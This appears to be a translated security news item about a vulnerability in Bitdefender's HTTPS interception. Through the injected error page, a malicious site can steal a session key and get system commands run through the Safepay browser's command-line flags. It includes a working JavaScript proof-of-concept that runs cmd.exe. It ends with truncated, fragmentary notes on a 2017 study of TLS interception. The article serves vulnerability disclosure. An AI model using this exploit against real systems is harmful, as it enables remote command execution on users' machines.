Vladimir Palant, creator of Adblock Plus,
The reason for the problem is that Bitdefender antivirus performs local interception of HTTPS traffic by replacing the site's original TLS certificate. An additional root certificate is installed on the client system, which allows you to hide the operation of the traffic inspection system used. The anti-virus wedges itself into secure traffic and substitutes its own JavaScript code in some pages to implement the Safe Search function, and in case of problems with the secure connection certificate, it replaces the error page with its own. Since the new error page is issued on behalf of the server being opened, other pages on that server have full access to the content inserted by Bitdefender.
When an attacker-controlled site is opened, that site can send an XMLHttpRequest and feign an HTTPS certificate issue in response, which will return an error page spoofed by Bitdefender. Since the error page is opened in the context of the attacker's domain, the attacker can read the contents of the spoofed Bitdefender settings page. The page substituted by Bitdefender also contains a session key that allows using the internal Bitdefender API to launch a separate Safepay browser session, specifying arbitrary command line flags, and achieve the launch of any system commands using the β-utility-cmd-prefixβ flag. Exploit example (param1 and param2 are the values ββobtained from the error page):
var request = new XMLHttpRequest();
request.open("POST", Math.random());
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.setRequestHeader(Β«BDNDSS_B67EA559F21B487F861FDA8A44F01C50Β», param1);
request.setRequestHeader(Β«BDNDCA_BBACF84D61A04F9AA66019A14B035478Β», param2);
request.setRequestHeader(Β«BDNDWB_5056E556833D49C1AF4085CB254FC242Β», Β«obk.runΒ»);
request.setRequestHeader(Β«BDNDOK_4E961A95B7B44CBCA1907D3D3643370DΒ», location.href);
request.send("data:text/html,nada --utility-cmd-prefix=\"cmd.exe /k whoami & echo\"");
Please note that a 2017 study
Only 11 out of 26 products provided up-to-date cipher suites. 5 systems did not perform certificate verification (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). Kaspersky Internet Security and Total Security products were attacked
Source: opennet.ru